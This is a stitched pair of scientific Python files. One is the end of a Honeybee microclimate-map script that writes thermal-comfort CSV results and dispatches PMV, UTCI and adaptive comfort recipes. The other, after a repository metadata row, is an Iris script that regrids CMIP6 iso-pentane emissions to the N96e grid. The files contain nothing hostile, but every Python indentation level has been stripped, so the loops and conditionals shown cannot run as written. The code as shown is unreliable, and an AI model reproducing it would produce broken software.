#Write the adaptive comfort result file.
PPD_Result = os.path.join(workingDir, PPDFile)
comfCSVfile = open(PPD_Result, 'wb')
for lineCount, line in enumerate(PMVComfMtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
comfCSVfile.write(lineStr)
else: comfCSVfile.write(line + "\n")
comfCSVfile.close()
#Write the deg from target result file.
PMV_Result = os.path.join(workingDir, PMVFile)
degCSVfile = open(PMV_Result, 'wb')
for lineCount, line in enumerate(PMV_Mtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
degCSVfile.write(lineStr)
else: degCSVfile.write(line + "\n")
degCSVfile.close()
return radTempResult, airTempResult, SET_Result, PPD_Result, PMV_Result
def writeCSVUTCI(lb_preparation, directory, fileName, radTempMtx, airTempMtx, UTCI_Mtx, OutdoorComfMtx, DegFromNeutralMtx):
#Find out the number of values in each hour.
valLen = len(radTempMtx[-1])-1
#Set up a working directory.
workingDir = lb_preparation.makeWorkingDir(os.path.join(directory))
#Create a csv Files.
radTempFile = fileName + "RadiantTemp.csv"
airTempFile = fileName + "AirTemp.csv"
UTCIFile = fileName + "UTCI.csv"
OutdoorComfFile = fileName + "PPD.csv"
DegFromNeutralFile = fileName + "PMV.csv"
#Write the radiant temperature result file.
if writeResultFile_ != 2:
radTempResult = os.path.join(workingDir, radTempFile)
radCSVfile = open(radTempResult, 'wb')
for lineCount, line in enumerate(radTempMtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
radCSVfile.write(lineStr)
else: radCSVfile.write(line + "\n")
radCSVfile.close()
else:
radTempResult = None
#Write the air temperature result file.
if writeResultFile_ != 2:
airTempResult = os.path.join(workingDir, airTempFile)
airCSVfile = open(airTempResult, 'wb')
for lineCount, line in enumerate(airTempMtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
airCSVfile.write(lineStr)
else: airCSVfile.write(line + "\n")
airCSVfile.close()
else:
airTempResult = None
#Write the operative temperature result file.
if writeResultFile_ != 2:
UTCI_Result = os.path.join(workingDir, UTCIFile)
opCSVfile = open(UTCI_Result, 'wb')
for lineCount, line in enumerate(UTCI_Mtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
opCSVfile.write(lineStr)
else: opCSVfile.write(line + "\n")
opCSVfile.close()
else:
UTCI_Result = None
#Write the adaptive comfort result file.
OutdoorComfResult = os.path.join(workingDir, OutdoorComfFile)
comfCSVfile = open(OutdoorComfResult, 'wb')
for lineCount, line in enumerate(OutdoorComfMtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
comfCSVfile.write(lineStr)
else: comfCSVfile.write(line + "\n")
comfCSVfile.close()
#Write the deg from target result file.
DegFromNeutralResult = os.path.join(workingDir, DegFromNeutralFile)
degCSVfile = open(DegFromNeutralResult, 'wb')
for lineCount, line in enumerate(DegFromNeutralMtx):
lineStr = ''
if lineCount != 0:
for valCt, val in enumerate(line):
if valCt != valLen: lineStr = lineStr + str(val) + ','
else: lineStr = lineStr + str(val) + "\n"
degCSVfile.write(lineStr)
else: degCSVfile.write(line + "\n")
degCSVfile.close()
return radTempResult, airTempResult, UTCI_Result, OutdoorComfResult, DegFromNeutralResult
#Import the classes, check the inputs, and generate default values for grid size if the user has given none.
checkLB = True
if sc.sticky.has_key('ladybug_release'):
lb_defaultFolder = sc.sticky["Ladybug_DefaultFolder"]
lb_preparation = sc.sticky["ladybug_Preparation"]()
lb_visualization = sc.sticky["ladybug_ResultVisualization"]()
lb_sunpath = sc.sticky["ladybug_SunPath"]()
lb_comfortModels = sc.sticky["ladybug_ComfortModels"]()
lb_wind = sc.sticky["ladybug_WindSpeed"]()
else:
checkLB = False
print "You should let the Ladybug fly first..."
w = gh.GH_RuntimeMessageLevel.Warning
ghenv.Component.AddRuntimeMessage(w, "You should let the Ladybug fly first...")
#Check the type of comfort analysis recipe connected.
recipeRecognized = False
comfortModel = None
if len(_comfAnalysisRecipe) > 0:
if len(_comfAnalysisRecipe) == 53 and _comfAnalysisRecipe[0] == "Adaptive":
comfortModel, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, zoneSrfNames, testPtViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, prevailingOutdoorTemp, ASHRAEorEN, comfClass, avgMonthOrRunMean, levelOfConditioning, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, dataAnalysisPeriod, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, northAngle = _comfAnalysisRecipe
recipeRecognized = True
elif len(_comfAnalysisRecipe) == 56 and _comfAnalysisRecipe[0] == "PMV":
comfortModel, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, relHumidDataHeaders, relHumidDataNumbers, clothingLevel, metabolicRate, zoneSrfNames, testPtViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, PPDComfortThresh, humidRatioUp, humidRatioLow, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, outDryBulbTemp, outRelHumid, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, dataAnalysisPeriod = _comfAnalysisRecipe
recipeRecognized = True
elif len(_comfAnalysisRecipe) == 51 and _comfAnalysisRecipe[0] == "UTCI":
comfortModel, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, relHumidDataHeaders, relHumidDataNumbers, zoneSrfNames, testPtViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, outDryBulbTemp, outRelHumid, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, dataAnalysisPeriod = _comfAnalysisRecipe
recipeRecognized = True
else:
warning = 'Comfort recipe not recognized.'
print warning
ghenv.Component.AddRuntimeMessage(gh.GH_RuntimeMessageLevel.Warning, warning)
#Manage the input and output.
manageOutput(comfortModel)
#Check the data input.
checkData = False
if recipeRecognized == True and checkLB == True:
checkData, HOYs, analysisPeriod, fileName, directory = setDefaults(lb_defaultFolder, lb_preparation)
if checkData == True and _runIt == True:
if comfortModel == "Adaptive":
result = mainAdapt(HOYs, analysisPeriod, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, zoneSrfNames, testPtViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, prevailingOutdoorTemp, ASHRAEorEN, comfClass, avgMonthOrRunMean, levelOfConditioning, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, dataAnalysisPeriod, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, northAngle, lb_preparation, lb_sunpath, lb_comfortModels, lb_wind)
if result != -1:
radTempMtx, airTempMtx, operativeTempMtx, adaptComfMtx, degFromTargetMtx = result
if writeResultFile_ != 0:
radTempResult, airTempResult, operativeTempResult, adaptComfResult, degFromTargetResult = writeCSVAdapt(lb_preparation, directory, fileName, radTempMtx, airTempMtx, operativeTempMtx, adaptComfMtx, degFromTargetMtx)
elif comfortModel == "PMV":
result = mainPMV(HOYs, analysisPeriod, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, relHumidDataHeaders, relHumidDataNumbers, clothingLevel, metabolicRate, zoneSrfNames, testPtViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, PPDComfortThresh, humidRatioUp, humidRatioLow, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, outDryBulbTemp, outRelHumid, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, dataAnalysisPeriod, lb_preparation, lb_sunpath, lb_comfortModels, lb_wind)
if result != -1:
radTempMtx, airTempMtx, SET_Mtx, PMVComfMtx, PMV_Mtx = result
if writeResultFile_ != 0:
radTempResult, airTempResult, SET_Result, PMVComfResult, PMV_Result = writeCSVPMV(lb_preparation, directory, fileName, radTempMtx, airTempMtx, SET_Mtx, PMVComfMtx, PMV_Mtx)
elif comfortModel == "UTCI":
result = mainUTCI(HOYs, analysisPeriod, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, relHumidDataHeaders, relHumidDataNumbers, zoneSrfNames, testPtViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, outDryBulbTemp, outRelHumid, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, dataAnalysisPeriod, lb_preparation, lb_sunpath, lb_comfortModels, lb_wind)
if result != -1:
radTempMtx, airTempMtx, UTCI_Mtx, OutdoorComfMtx, DegFromNeutralMtx = result
if writeResultFile_ != 0:
radTempResult, airTempResult, UTCI_Result, OutdoorComfResult, DegFromNeutralResult = writeCSVUTCI(lb_preparation, directory, fileName, radTempMtx, airTempMtx, UTCI_Mtx, OutdoorComfMtx, DegFromNeutralMtx)
|
samuto/Honeybee
|
src/Honeybee_Microclimate Map Analysis.py
|
Python
|
gpl-3.0
| 100,915
|
[
"EPW"
] |
0659d2e1970f1ac97fd1c76b3d513886d2993466bb246cbd935b2fc1a0e5fdb2
|
#!/usr/bin/env python
##############################################################################################
#
#
# CMIP6_hybrid_regrid_emissions_N96e.py
#
#
# Requirements:
# Iris 1.10, time, cf_units, numpy
#
#
# This Python script has been written by N.L. Abraham as part of the UKCA Tutorials:
# http://www.ukca.ac.uk/wiki/index.php/UKCA_Chemistry_and_Aerosol_Tutorials_at_vn10.4
#
# Copyright (C) 2015 University of Cambridge
#
# This is free software: you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# It is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details.
#
# You find a copy of the GNU Lesser General Public License at <http://www.gnu.org/licenses/>.
#
# Written by N. Luke Abraham 2016-10-20 <nla27@cam.ac.uk>
# Modified by Marcus Koehler 2017-10-11 <mok21@cam.ac.uk>
#
#
##############################################################################################
# preamble
import time
import iris
import cf_units
import numpy
# --- CHANGE THINGS BELOW THIS LINE TO WORK WITH YOUR FILES ETC. ---
# name of file containing an ENDGame grid, e.g. your model output
# NOTE: all the fields in the file should be on the same horizontal
# grid, as the field used MAY NOT be the first in order of STASH
grid_file='/group_workspaces/jasmin2/ukca/vol1/mkoehler/um/archer/ag542/apm.pp/ag542a.pm1988dec'
#
# name of emissions file
# NOTE: We use the fluxes from the Gregorian calendar file also for the 360_day emission files
emissions_file='/group_workspaces/jasmin2/ukca/vol1/mkoehler/emissions/OXBUDS/0.5x0.5/cmip6_hybrid/v2/CMIP6_hybrid_combined_iso-pentane_1960-2020_v2_greg.nc'
# --- BELOW THIS LINE, NOTHING SHOULD NEED TO BE CHANGED ---
species_name='i-C5H12'
# this is the grid we want to regrid to, e.g. N96 ENDGame
grd=iris.load(grid_file)[0]
grd.coord(axis='x').guess_bounds()
grd.coord(axis='y').guess_bounds()
# This is the original data
ems=iris.load_cube(emissions_file)
# make intersection between 0 and 360 longitude to ensure that
# the data is regridded correctly
nems = ems.intersection(longitude=(0, 360))
# make sure that we use the same coordinate system, otherwise regrid won't work
nems.coord(axis='x').coord_system=grd.coord_system()
nems.coord(axis='y').coord_system=grd.coord_system()
# now guess the bounds of the new grid prior to regridding
nems.coord(axis='x').guess_bounds()
nems.coord(axis='y').guess_bounds()
# now regrid
ocube=nems.regrid(grd,iris.analysis.AreaWeighted())
# now add correct attributes and names to netCDF file
ocube.var_name='emissions_'+str.strip(species_name)
ocube.long_name='iso-pentane surface emissions'
ocube.units=cf_units.Unit('kg m-2 s-1')
ocube.attributes['vertical_scaling']='surface'
ocube.attributes['tracer_name']=str.strip(species_name)
# global attributes, so don't set in local_keys
# NOTE: all these should be strings, including the numbers!
# basic emissions type
ocube.attributes['emission_type']='1' # time series
ocube.attributes['update_type']='1' # same as above
ocube.attributes['update_freq_in_hours']='120' # i.e. 5 days
ocube.attributes['um_version']='10.6' # UM version
ocube.attributes['source']='CMIP6_hybrid_combined_iso-pentane_1960-2020_v2_greg.nc'
ocube.attributes['title']='Time-varying monthly surface emissions of iso-pentane from 1960 to 2020.'
ocube.attributes['File_version']='CMIP6_hybrid_v2'
ocube.attributes['File_creation_date']=time.ctime(time.time())
ocube.attributes['grid']='regular 1.875 x 1.25 degree longitude-latitude grid (N96e)'
ocube.attributes['history']=time.ctime(time.time())+': '+__file__+' \n'+ocube.attributes['history']
ocube.attributes['institution']='Centre for Atmospheric Science, Department of Chemistry, University of Cambridge, U.K.'
ocube.attributes['reference']='Hoesly et al., Geosci. Mod. Dev., 2018; Granier et al., Clim. Change, 2011; Lamarque et al., Atmos. Chem. Phys., 2010; Helmig et al., Atmos. Environ., 2014.'
del ocube.attributes['file_creation_date']
del ocube.attributes['description']
# rename and set time coord - mid-month from 1960-Jan to 2020-Dec
# this bit is annoyingly fiddly
ocube.coord(axis='t').var_name='time'
ocube.coord(axis='t').standard_name='time'
ocube.coords(axis='t')[0].units=cf_units.Unit('days since 1960-01-01 00:00:00', calendar='360_day')
ocube.coord(axis='t').points=numpy.array([
15, 45, 75, 105, 135, 165, 195, 225, 255, 285, 315, 345, 375, 405,
435, 465, 495, 525, 555, 585, 615, 645, 675, 705, 735, 765, 795, 825,
855, 885, 915, 945, 975, 1005, 1035, 1065, 1095, 1125, 1155, 1185, 1215,
1245, 1275, 1305, 1335, 1365, 1395, 1425, 1455, 1485, 1515, 1545, 1575,
1605, 1635, 1665, 1695, 1725, 1755, 1785, 1815, 1845, 1875, 1905, 1935,
1965, 1995, 2025, 2055, 2085, 2115, 2145, 2175, 2205, 2235, 2265, 2295,
2325, 2355, 2385, 2415, 2445, 2475, 2505, 2535, 2565, 2595, 2625, 2655,
2685, 2715, 2745, 2775, 2805, 2835, 2865, 2895, 2925, 2955, 2985, 3015,
3045, 3075, 3105, 3135, 3165, 3195, 3225, 3255, 3285, 3315, 3345, 3375,
3405, 3435, 3465, 3495, 3525, 3555, 3585, 3615, 3645, 3675, 3705, 3735,
3765, 3795, 3825, 3855, 3885, 3915, 3945, 3975, 4005, 4035, 4065, 4095,
4125, 4155, 4185, 4215, 4245, 4275, 4305, 4335, 4365, 4395, 4425, 4455,
4485, 4515, 4545, 4575, 4605, 4635, 4665, 4695, 4725, 4755, 4785, 4815,
4845, 4875, 4905, 4935, 4965, 4995, 5025, 5055, 5085, 5115, 5145, 5175,
5205, 5235, 5265, 5295, 5325, 5355, 5385, 5415, 5445, 5475, 5505, 5535,
5565, 5595, 5625, 5655, 5685, 5715, 5745, 5775, 5805, 5835, 5865, 5895,
5925, 5955, 5985, 6015, 6045, 6075, 6105, 6135, 6165, 6195, 6225, 6255,
6285, 6315, 6345, 6375, 6405, 6435, 6465, 6495, 6525, 6555, 6585, 6615,
6645, 6675, 6705, 6735, 6765, 6795, 6825, 6855, 6885, 6915, 6945, 6975,
7005, 7035, 7065, 7095, 7125, 7155, 7185, 7215, 7245, 7275, 7305, 7335,
7365, 7395, 7425, 7455, 7485, 7515, 7545, 7575, 7605, 7635, 7665, 7695,
7725, 7755, 7785, 7815, 7845, 7875, 7905, 7935, 7965, 7995, 8025, 8055,
8085, 8115, 8145, 8175, 8205, 8235, 8265, 8295, 8325, 8355, 8385, 8415,
8445, 8475, 8505, 8535, 8565, 8595, 8625, 8655, 8685, 8715, 8745, 8775,
8805, 8835, 8865, 8895, 8925, 8955, 8985, 9015, 9045, 9075, 9105, 9135,
9165, 9195, 9225, 9255, 9285, 9315, 9345, 9375, 9405, 9435, 9465, 9495,
9525, 9555, 9585, 9615, 9645, 9675, 9705, 9735, 9765, 9795, 9825, 9855,
9885, 9915, 9945, 9975, 10005, 10035, 10065, 10095, 10125, 10155, 10185,
10215, 10245, 10275, 10305, 10335, 10365, 10395, 10425, 10455, 10485,
10515, 10545, 10575, 10605, 10635, 10665, 10695, 10725, 10755, 10785,
10815, 10845, 10875, 10905, 10935, 10965, 10995, 11025, 11055, 11085,
11115, 11145, 11175, 11205, 11235, 11265, 11295, 11325, 11355, 11385,
11415, 11445, 11475, 11505, 11535, 11565, 11595, 11625, 11655, 11685,
11715, 11745, 11775, 11805, 11835, 11865, 11895, 11925, 11955, 11985,
12015, 12045, 12075, 12105, 12135, 12165, 12195, 12225, 12255, 12285,
12315, 12345, 12375, 12405, 12435, 12465, 12495, 12525, 12555, 12585,
12615, 12645, 12675, 12705, 12735, 12765, 12795, 12825, 12855, 12885,
12915, 12945, 12975, 13005, 13035, 13065, 13095, 13125, 13155, 13185,
13215, 13245, 13275, 13305, 13335, 13365, 13395, 13425, 13455, 13485,
13515, 13545, 13575, 13605, 13635, 13665, 13695, 13725, 13755, 13785,
13815, 13845, 13875, 13905, 13935, 13965, 13995, 14025, 14055, 14085,
14115, 14145, 14175, 14205, 14235, 14265, 14295, 14325, 14355, 14385,
14415, 14445, 14475, 14505, 14535, 14565, 14595, 14625, 14655, 14685,
14715, 14745, 14775, 14805, 14835, 14865, 14895, 14925, 14955, 14985,
15015, 15045, 15075, 15105, 15135, 15165, 15195, 15225, 15255, 15285,
15315, 15345, 15375, 15405, 15435, 15465, 15495, 15525, 15555, 15585,
15615, 15645, 15675, 15705, 15735, 15765, 15795, 15825, 15855, 15885,
15915, 15945, 15975, 16005, 16035, 16065, 16095, 16125, 16155, 16185,
16215, 16245, 16275, 16305, 16335, 16365, 16395, 16425, 16455, 16485,
16515, 16545, 16575, 16605, 16635, 16665, 16695, 16725, 16755, 16785,
16815, 16845, 16875, 16905, 16935, 16965, 16995, 17025, 17055, 17085,
17115, 17145, 17175, 17205, 17235, 17265, 17295, 17325, 17355, 17385,
17415, 17445, 17475, 17505, 17535, 17565, 17595, 17625, 17655, 17685,
17715, 17745, 17775, 17805, 17835, 17865, 17895, 17925, 17955, 17985,
18015, 18045, 18075, 18105, 18135, 18165, 18195, 18225, 18255, 18285,
18315, 18345, 18375, 18405, 18435, 18465, 18495, 18525, 18555, 18585,
18615, 18645, 18675, 18705, 18735, 18765, 18795, 18825, 18855, 18885,
18915, 18945, 18975, 19005, 19035, 19065, 19095, 19125, 19155, 19185,
19215, 19245, 19275, 19305, 19335, 19365, 19395, 19425, 19455, 19485,
19515, 19545, 19575, 19605, 19635, 19665, 19695, 19725, 19755, 19785,
19815, 19845, 19875, 19905, 19935, 19965, 19995, 20025, 20055, 20085,
20115, 20145, 20175, 20205, 20235, 20265, 20295, 20325, 20355, 20385,
20415, 20445, 20475, 20505, 20535, 20565, 20595, 20625, 20655, 20685,
20715, 20745, 20775, 20805, 20835, 20865, 20895, 20925, 20955, 20985,
21015, 21045, 21075, 21105, 21135, 21165, 21195, 21225, 21255, 21285,
21315, 21345, 21375, 21405, 21435, 21465, 21495, 21525, 21555, 21585,
21615, 21645, 21675, 21705, 21735, 21765, 21795, 21825, 21855, 21885,
21915, 21945 ])
# make z-direction.
zdims=iris.coords.DimCoord(numpy.array([0]),standard_name = 'model_level_number',
units='1',attributes={'positive':'up'})
ocube.add_aux_coord(zdims)
ocube=iris.util.new_axis(ocube, zdims)
# now transpose cube to put Z 2nd
ocube.transpose([1,0,2,3])
# make coordinates 64-bit
ocube.coord(axis='x').points=ocube.coord(axis='x').points.astype(dtype='float64')
ocube.coord(axis='y').points=ocube.coord(axis='y').points.astype(dtype='float64')
#ocube.coord(axis='z').points=ocube.coord(axis='z').points.astype(dtype='float64') # integer
ocube.coord(axis='t').points=ocube.coord(axis='t').points.astype(dtype='float64')
# for some reason, longitude_bounds are double, but latitude_bounds are float
ocube.coord('latitude').bounds=ocube.coord('latitude').bounds.astype(dtype='float64')
# add forecast_period & forecast_reference_time
# forecast_reference_time
frt=numpy.array([
15, 45, 75, 105, 135, 165, 195, 225, 255, 285, 315, 345, 375, 405,
435, 465, 495, 525, 555, 585, 615, 645, 675, 705, 735, 765, 795, 825,
855, 885, 915, 945, 975, 1005, 1035, 1065, 1095, 1125, 1155, 1185, 1215,
1245, 1275, 1305, 1335, 1365, 1395, 1425, 1455, 1485, 1515, 1545, 1575,
1605, 1635, 1665, 1695, 1725, 1755, 1785, 1815, 1845, 1875, 1905, 1935,
1965, 1995, 2025, 2055, 2085, 2115, 2145, 2175, 2205, 2235, 2265, 2295,
2325, 2355, 2385, 2415, 2445, 2475, 2505, 2535, 2565, 2595, 2625, 2655,
2685, 2715, 2745, 2775, 2805, 2835, 2865, 2895, 2925, 2955, 2985, 3015,
3045, 3075, 3105, 3135, 3165, 3195, 3225, 3255, 3285, 3315, 3345, 3375,
3405, 3435, 3465, 3495, 3525, 3555, 3585, 3615, 3645, 3675, 3705, 3735,
3765, 3795, 3825, 3855, 3885, 3915, 3945, 3975, 4005, 4035, 4065, 4095,
4125, 4155, 4185, 4215, 4245, 4275, 4305, 4335, 4365, 4395, 4425, 4455,
4485, 4515, 4545, 4575, 4605, 4635, 4665, 4695, 4725, 4755, 4785, 4815,
4845, 4875, 4905, 4935, 4965, 4995, 5025, 5055, 5085, 5115, 5145, 5175,
5205, 5235, 5265, 5295, 5325, 5355, 5385, 5415, 5445, 5475, 5505, 5535,
5565, 5595, 5625, 5655, 5685, 5715, 5745, 5775, 5805, 5835, 5865, 5895,
5925, 5955, 5985, 6015, 6045, 6075, 6105, 6135, 6165, 6195, 6225, 6255,
6285, 6315, 6345, 6375, 6405, 6435, 6465, 6495, 6525, 6555, 6585, 6615,
6645, 6675, 6705, 6735, 6765, 6795, 6825, 6855, 6885, 6915, 6945, 6975,
7005, 7035, 7065, 7095, 7125, 7155, 7185, 7215, 7245, 7275, 7305, 7335,
7365, 7395, 7425, 7455, 7485, 7515, 7545, 7575, 7605, 7635, 7665, 7695,
7725, 7755, 7785, 7815, 7845, 7875, 7905, 7935, 7965, 7995, 8025, 8055,
8085, 8115, 8145, 8175, 8205, 8235, 8265, 8295, 8325, 8355, 8385, 8415,
8445, 8475, 8505, 8535, 8565, 8595, 8625, 8655, 8685, 8715, 8745, 8775,
8805, 8835, 8865, 8895, 8925, 8955, 8985, 9015, 9045, 9075, 9105, 9135,
9165, 9195, 9225, 9255, 9285, 9315, 9345, 9375, 9405, 9435, 9465, 9495,
9525, 9555, 9585, 9615, 9645, 9675, 9705, 9735, 9765, 9795, 9825, 9855,
9885, 9915, 9945, 9975, 10005, 10035, 10065, 10095, 10125, 10155, 10185,
10215, 10245, 10275, 10305, 10335, 10365, 10395, 10425, 10455, 10485,
10515, 10545, 10575, 10605, 10635, 10665, 10695, 10725, 10755, 10785,
10815, 10845, 10875, 10905, 10935, 10965, 10995, 11025, 11055, 11085,
11115, 11145, 11175, 11205, 11235, 11265, 11295, 11325, 11355, 11385,
11415, 11445, 11475, 11505, 11535, 11565, 11595, 11625, 11655, 11685,
11715, 11745, 11775, 11805, 11835, 11865, 11895, 11925, 11955, 11985,
12015, 12045, 12075, 12105, 12135, 12165, 12195, 12225, 12255, 12285,
12315, 12345, 12375, 12405, 12435, 12465, 12495, 12525, 12555, 12585,
12615, 12645, 12675, 12705, 12735, 12765, 12795, 12825, 12855, 12885,
12915, 12945, 12975, 13005, 13035, 13065, 13095, 13125, 13155, 13185,
13215, 13245, 13275, 13305, 13335, 13365, 13395, 13425, 13455, 13485,
13515, 13545, 13575, 13605, 13635, 13665, 13695, 13725, 13755, 13785,
13815, 13845, 13875, 13905, 13935, 13965, 13995, 14025, 14055, 14085,
14115, 14145, 14175, 14205, 14235, 14265, 14295, 14325, 14355, 14385,
14415, 14445, 14475, 14505, 14535, 14565, 14595, 14625, 14655, 14685,
14715, 14745, 14775, 14805, 14835, 14865, 14895, 14925, 14955, 14985,
15015, 15045, 15075, 15105, 15135, 15165, 15195, 15225, 15255, 15285,
15315, 15345, 15375, 15405, 15435, 15465, 15495, 15525, 15555, 15585,
15615, 15645, 15675, 15705, 15735, 15765, 15795, 15825, 15855, 15885,
15915, 15945, 15975, 16005, 16035, 16065, 16095, 16125, 16155, 16185,
16215, 16245, 16275, 16305, 16335, 16365, 16395, 16425, 16455, 16485,
16515, 16545, 16575, 16605, 16635, 16665, 16695, 16725, 16755, 16785,
16815, 16845, 16875, 16905, 16935, 16965, 16995, 17025, 17055, 17085,
17115, 17145, 17175, 17205, 17235, 17265, 17295, 17325, 17355, 17385,
17415, 17445, 17475, 17505, 17535, 17565, 17595, 17625, 17655, 17685,
17715, 17745, 17775, 17805, 17835, 17865, 17895, 17925, 17955, 17985,
18015, 18045, 18075, 18105, 18135, 18165, 18195, 18225, 18255, 18285,
18315, 18345, 18375, 18405, 18435, 18465, 18495, 18525, 18555, 18585,
18615, 18645, 18675, 18705, 18735, 18765, 18795, 18825, 18855, 18885,
18915, 18945, 18975, 19005, 19035, 19065, 19095, 19125, 19155, 19185,
19215, 19245, 19275, 19305, 19335, 19365, 19395, 19425, 19455, 19485,
19515, 19545, 19575, 19605, 19635, 19665, 19695, 19725, 19755, 19785,
19815, 19845, 19875, 19905, 19935, 19965, 19995, 20025, 20055, 20085,
20115, 20145, 20175, 20205, 20235, 20265, 20295, 20325, 20355, 20385,
20415, 20445, 20475, 20505, 20535, 20565, 20595, 20625, 20655, 20685,
20715, 20745, 20775, 20805, 20835, 20865, 20895, 20925, 20955, 20985,
21015, 21045, 21075, 21105, 21135, 21165, 21195, 21225, 21255, 21285,
21315, 21345, 21375, 21405, 21435, 21465, 21495, 21525, 21555, 21585,
21615, 21645, 21675, 21705, 21735, 21765, 21795, 21825, 21855, 21885,
21915, 21945 ], dtype='float64')
frt_dims=iris.coords.AuxCoord(frt,standard_name = 'forecast_reference_time',
units=cf_units.Unit('days since 1960-01-01 00:00:00', calendar='360_day'))
ocube.add_aux_coord(frt_dims,data_dims=0)
ocube.coord('forecast_reference_time').guess_bounds()
# forecast_period
fp=numpy.array([-360],dtype='float64')
fp_dims=iris.coords.AuxCoord(fp,standard_name = 'forecast_period',
units=cf_units.Unit('hours'),bounds=numpy.array([-720,0],dtype='float64'))
ocube.add_aux_coord(fp_dims,data_dims=None)
# add-in cell_methods
ocube.cell_methods = [iris.coords.CellMethod('mean', 'time')]
# set _FillValue
fillval=1e+20
ocube.data = numpy.ma.array(data=ocube.data, fill_value=fillval, dtype='float32')
# output file name, based on species
outpath='ukca_emiss_iC5H12.nc'
# don't want time to be cattable, as is a periodic emissions file
iris.FUTURE.netcdf_no_unlimited=True
